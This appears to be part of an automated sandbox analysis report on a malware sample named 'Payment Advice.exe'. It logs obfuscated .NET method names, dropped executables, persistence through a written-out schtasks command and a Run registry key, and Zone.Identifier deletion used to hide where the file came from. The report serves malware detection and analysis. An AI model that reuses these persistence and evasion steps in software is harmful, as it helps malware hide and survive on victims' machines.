                    Source: 0.2.Payment Advice.exe.b470000.9.raw.unpack, TSuJXh688KCvDRA8xS.csHigh entropy of concatenated method names: 'ei3pKoIYfr', 'moCpdXr3Ju', 'O1CpOZBwDQ', 'RUrpTogNg1', 'WUGpJ7YNyd', 'bxVpwYleWS', 'kvoueXMOm5Q1SmlxXi', 'pYhjSI0urU5QYksA49', 'n5FppYHYrI', 'fL6pDlm01c'
                    Source: 0.2.Payment Advice.exe.b470000.9.raw.unpack, TfJtmBfwbVKTZLpqD3.csHigh entropy of concatenated method names: 'cmAr0bSsRt', 'jb8rvNqRO3', 'RRCrMjmfw5', 'B2VrIZ2GEj', 'eLKrJ85HTQ', 'MaQrwqQAhW', 'qPtr5xBcwx', 'VkhrgGY6v5', 'VwVr7uORve', 'TTorijefRO'
                    Source: 0.2.Payment Advice.exe.b470000.9.raw.unpack, z3JXvXmmMR8LABifXF.csHigh entropy of concatenated method names: 'MNe1UwKM8', 'D6N0kRAP7', 'n5Nv7Lvc4', 'DO2GxDV12', 'MefIijA26', 'PqUsMIlAE', 'TgxKcq6CEY0ShNRXym', 'MjV50ZBx5Zq2lxQjva', 'vKngh5OxF', 'KkYigsO3F'
                    Source: 0.2.Payment Advice.exe.b470000.9.raw.unpack, sOMv7bgiRmU007FApa.csHigh entropy of concatenated method names: 'uxI7pdRerW', 'HS07DnctEt', 'sj97jh8vvR', 'gRd7Rxg9Vm', 'hkl7nmacGN', 'jYW7NTWrIn', 'Gmx7UlikXw', 'kyGgasyxi0', 'DkygcDjI6M', 'T4mgQ3hN3S'
                    Source: 0.2.Payment Advice.exe.b470000.9.raw.unpack, vMCUf22TOWfFJfIcQU.csHigh entropy of concatenated method names: 'ToString', 'tpPwyaLUNI', 'bMAw3AS9yd', 'ndfwBIdFbJ', 'zOtwEA1J0w', 'SS3w2cgs2Y', 'Tdjw652ika', 'zOqwPuc6uh', 'eG8weVRuAx', 'H21wqdTjxY'
                    Source: 0.2.Payment Advice.exe.b470000.9.raw.unpack, k8kSUDwarKJEU7Xa30.csHigh entropy of concatenated method names: 'cOinLdtRg7', 'N8Vn99vQp1', 't2JnXoI9PJ', 'F3LnkQnQYw', 'VI3nfVBOZx', 'aB5nVZh6tY', 'e6InaMotY4', 'S1ZncZOoVc', 'mdqnQYRYc0', 'Q9rnHsRZVk'
                    Source: 0.2.Payment Advice.exe.b470000.9.raw.unpack, nUo34hz6QsbQPWCtYV.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'oZy7ZuOZdh', 'FWt7JYvoRg', 'wjl7wQmbUc', 'Xsr75Vv6EA', 'AFp7gSTXWF', 'QYV7726pVb', 'W4F7i0edYs'
                    Source: 0.2.Payment Advice.exe.b470000.9.raw.unpack, UpQHmstwEVKTgZGGgR.csHigh entropy of concatenated method names: 'Gh0NS2uFRD', 'tWYNGuX9kt', 'UstrBb7lVZ', 'tkVrEhSfu4', 'rdsr27Em69', 'gmTr6YJNgn', 'h8ZrPeZPs8', 'UiJreXQnoS', 'Hv4rqxQpdc', 'XbGroxSHiR'
                    Source: 0.2.Payment Advice.exe.b470000.9.raw.unpack, Ex8GEybODp9w5PDMiRh.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'kUfiLr5uGy', 'IPmi9u4sj5', 'mJMiXU84Nf', 'PWVikZ5nQa', 'IDuif2GqVH', 'zHqiV9myaw', 'Je0iauMVCy'
                    Source: 0.2.Payment Advice.exe.b470000.9.raw.unpack, Hv2PvdJu2lR4hIVvn9.csHigh entropy of concatenated method names: 'iwLZMud7uP', 'RUdZInlfp1', 'IN2ZWbGKQc', 'U5MZ3DRTY8', 'RL6ZESwAmq', 'ad0Z2B80qB', 'cWCZPHbtEI', 'MV0ZeYUTBW', 'NPCZoscrYR', 'REqZyTb42W'
                    Source: 0.2.Payment Advice.exe.b470000.9.raw.unpack, xuq9NBsGj38hal6MpI.csHigh entropy of concatenated method names: 'jwKJoN0f0d', 'LlpJu8rK3y', 'eZ1JLCAD8k', 'C3ZJ9mFGtU', 'UP7J3LBteg', 'GByJBpH2q4', 'ltdJE9TvBX', 'fULJ2gL56I', 'TQlJ6hldem', 'YylJPdQbbM'
                    Source: 0.2.Payment Advice.exe.b470000.9.raw.unpack, YyZUO9b5whwYWTkytbE.csHigh entropy of concatenated method names: 'n7E7AN38Ju', 'AE47bDETub', 'n0d71JW0Gq', 'XH670cjHVD', 'EGk7SqTiL9', 'rXa7vlnPfG', 'x2P7GteEOf', 'lPA7MhYVP0', 'aFv7I5cZDZ', 'Gcb7scQDcK'
                    Source: 0.2.Payment Advice.exe.b470000.9.raw.unpack, NFWBpM4mPw4rlyE4h1.csHigh entropy of concatenated method names: 'Dispose', 'lpEpQ1CnJM', 't5E43ZeSb2', 'VffCCYlVy8', 'jrmpHDpc1L', 'zTVpzdcr92', 'ProcessDialogKey', 'PgS4mecuej', 'hiE4pDjYxQ', 'LhM441QNTV'
                    Source: 0.2.Payment Advice.exe.b470000.9.raw.unpack, ts6Ukvnuhx7ka3epjf.csHigh entropy of concatenated method names: 'GHOUY12Ajx', 'OF8UnsDkYr', 'jAVUNidD8v', 'BEcUKYphPP', 'WBDUdmyZq7', 'osFNfHstVe', 'y9BNVShpwK', 'y7LNavY12Y', 'tQXNcHHQEN', 'XOGNQci9Xv'
                    Source: 0.2.Payment Advice.exe.b470000.9.raw.unpack, TSrMHgQjhmviKA4M93.csHigh entropy of concatenated method names: 'sGUgWoCEnA', 'ievg3O9Nrf', 'LjwgBGsBVp', 'SovgEiU8UR', 'So0gLsL5K4', 'xIVg2T2kpi', 'Next', 'Next', 'Next', 'NextBytes'
                    Source: 0.2.Payment Advice.exe.b470000.9.raw.unpack, tkbEV7bmUUsmCjO133w.csHigh entropy of concatenated method names: 'ExhiAtJOME', 'PC6ibDYElD', 'orqi112ZO4', 'MoOU4OH55avXSJHmnje', 'wef3TbH6JcQpvxPO8cu', 'cc2oJbHB9wjNZ4VtfLs', 'kcRKjkHleDArZJiy7SF'
                    Source: 0.2.Payment Advice.exe.b470000.9.raw.unpack, sF7EofuwR9Zd9VpvII.csHigh entropy of concatenated method names: 'ontKRjRhsJ', 'o08KrFXwAs', 'p8nKUVLpdQ', 'Ef8UHHFFmC', 'eKUUzXSbZD', 'wqeKmgvEsT', 'XfVKp07PQi', 'F2lK4CwnMy', 'aAUKDRpAhP', 'nlYKjOTQIF'
                    Source: 0.2.Payment Advice.exe.b470000.9.raw.unpack, O1vH9MdC9n3P7LT7AU.csHigh entropy of concatenated method names: 'zXnKAXlb9g', 'unNKbJfRrG', 'l3KK15klMu', 'NVgK0r2oib', 'A4bKSHd9B5', 'vXeKv8nqgu', 'ymBKGJwnDZ', 'rp9KMU3cT7', 'jP2KI85I6H', 'h58KsPiTvr'
                    Source: C:\Users\user\Desktop\Payment Advice.exeFile created: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeJump to dropped file
                    Source: C:\Users\user\Desktop\Payment Advice.exeFile created: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exeJump to dropped file

                    Boot Survival

                    barindex
                    Uses schtasks.exe or at.exe to add and modify task schedules
                    Source: C:\Users\user\Desktop\Payment Advice.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\sFPEKzHsLkYZIz" /XML "C:\Users\user\AppData\Local\Temp\tmp6619.tmp"
                    Source: C:\Users\user\Desktop\Payment Advice.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run BjTxJteJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run BjTxJteJump to behavior

                    Hooking and other Techniques for Hiding and Protection

                    barindex
                    Hides that the sample has been downloaded from the Internet (zone.identifier)
                    Source: C:\Users\user\Desktop\Payment Advice.exeFile opened: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe:Zone.Identifier read attributes | deleteJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exeFile opened: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe:Zone.Identifier read attributes | delete
                    Loading BitLocker PowerShell Module
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
                    Source: C:\Users\user\Desktop\Payment Advice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
